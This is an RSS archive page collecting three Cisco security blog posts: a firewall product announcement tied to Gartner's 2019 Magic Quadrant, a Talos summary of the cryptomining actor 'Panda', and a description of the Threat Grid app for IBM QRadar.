Archiv für die Kategorie: RSS Feeds

By Dr. Gee Rittenhouse The network is at the heart of the digital transformation, and when it comes to securing it, the firewall remains the frontline of defense for organizations. But as the network continues to evolve, we know that security must adapt. For Cisco, this means providing network security that has world-class controls in every place you need them with unified policy and threat visibility. We have made significant strides towards that vision over the past 12 months, and it is always gratifying when the market acknowledges it.
To that end, I am thrilled to share that Gartner has once again named Cisco a Leader in the Magic Quadrant for Network Firewalls. We believe this recognition validates our multi-year journey to reimagine the firewall as the foundation of a truly integrated security platform.
Cisco has demonstrated its leadership in the market through continuous investment in innovation, including:
Cisco Defense Orchestrator (CDO). At Cisco Live U.S., we launched CDO, a cloud-based, API-driven product that simplifies and unifies policy and device management. From a single interface, you can now seamlessly orchestrate policy changes across all of your ASA, NGFW and Meraki MX devices.
Firepower with Cisco Threat Response (CTR). CTR accelerates detection, investigation and remediation of threats by automating integrations across Cisco Security products and threat intelligence sources. With the new FirePower integration, CTR can now utilize intrusion alerts from FirePower devices to cut through the noise and deliver curated alerts that truly need your attention.
New NGFW appliances. Earlier this year, we released new NGFW appliances that couple ease of use with deep visibility to protect your business – whether you are an SMB, service provider, or anything in between. With a strong cost to performance ratio, they offer a dramatic 3.5x performance boost over previous ASA and Firepower appliances and unique hardware-based capabilities for inspecting encrypted traffic.
These advancements, in addition to many others, have cemented our place in the next-generation firewall market. But we know that in order to deliver truly effective security, the firewall needs to be part of a larger integrated architecture that spans all threat vectors.
This is why Cisco has invested in building the broadest and most effective portfolio that spans the network, endpoint, cloud and workload. And now we are doing the hard work of integrating the products to create a security platform that can automatically share threat intelligence, policy information, and event data. As a result, you have visibility across all attack vectors, and when a Cisco Security product sees a threat in one place, the whole integrated system can automatically stop the threat everywhere across your IT ecosystem.
So, when you invest in Cisco NGFW, you are investing in a foundation for security that is agile and integrated, giving you the strongest security posture available.

Download the 2019 Gartner Magic Quadrant for Network Firewalls

Visit Cisco.com/go/NGFW to learn more about how Cisco NGFW can help secure your organization.

2019 Gartner Magic Quadrant for Network Firewalls, Rajpreet Kaur, Adam Hils, Jeremy D’Hoinne, John Watts, September 17, 2019.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Source:: Cisco Security Notice

By Talos Group By Christopher Evans and David Liebenberg.
Executive summary
A new threat actor named “Panda” has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we’ve ever seen, but it still has been one of the most active attackers we’ve seen in Cisco Talos threat trap data. Panda’s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.
Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.
Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread “MassMiner” campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns.
Read More >>

Source:: Cisco Security Notice

By Jessica Bair Download the app for faster, more effective threat detection and response
Two years ago, Cisco and IBM Security announced a strategic alliance to address the growing threat of cybercrime. This collaboration builds on each organization’s strengths and complementary offerings to provide integrated solutions, managed services and shared threat intelligence to drive more effective security for our joint customers. We continue to develop new applications for IBM’s QRadar security analytics platform and the Cisco Threat Grid app for QRadar with DSM was just released.
Cisco’s Threat Grid App integrates with IBM’s QRadar SIEM, enabling analysts to quickly identify, understand and respond to system threats rapidly through the QRadar dashboard. Downloadable via the IBM Security App Exchange, this powerful app combines advanced sandboxing, malware analysis and threat intelligence in one unified solution.
Threat Grid + QRadar enables analysts to quickly determine the behavior of possible malicious files, which have been submitted to Threat Grid, and rapidly drill down from QRadar into the Threat Grid unified malware analysis and threat intelligence platform, for deeper insight. This integration expedites the threat investigation process, with a dashboard view into the highest priority threats, delivered directly through QRadar versus having to pivot on disparate tools and interfaces.
Detailed results from the sandbox analysis of Threat Grid can be aggregated by QRadar to determine whether the potential threats within the organization are malicious or benign. Malware samples are then assigned a Threat Score, and displayed by hash value and the user which submitted the sample.

This information displayed on the Threat Grid dashboard can be used to quickly resolve threats detected by QRadar. This results in improved efficiency and optimization for security analysts, by quickly identifying the top priorities for threat investigation.
With the QRadar DSM capabilities, you can see the analysis results over time.

Also, under Log Activity, for suspicious IP addresses, you can use the right-click to see instant contextual threat intelligence from Threat Grid.

Threat Grid also integrates with IBM Resilient Incident Response Platform (IRP) for automated response and X-Force Exchange for even greater threat intelligence enrichment. For example, analysts in the IRP can look up Indicators of Compromise (IoC) with Cisco Threat Grid’s threat intelligence, or detonate suspected malware with its sandbox technology. This empowers security teams to gain valuable incident data in the moment of response.
These technology integrations between Cisco Security and IBM Security enables a more extensive security architecture for greater speed and efficiency in identifying, investigating, and remediating threats. Together, we deliver the intelligence, automation and analytics required to provide data and insights that today’s security practitioners require.
Please visit the Cisco and IBM page for the latest information about our partnership, and the Cisco Marketplace for details of the IBM integrations.

Note: Version 1.0.0 of the app has a coding error that limits its compatibility to the Threat Grid US Cloud. A fix for support of the Threat Grid European cloud and appliance are in validation testing with IBM.

Source:: Cisco Security Notice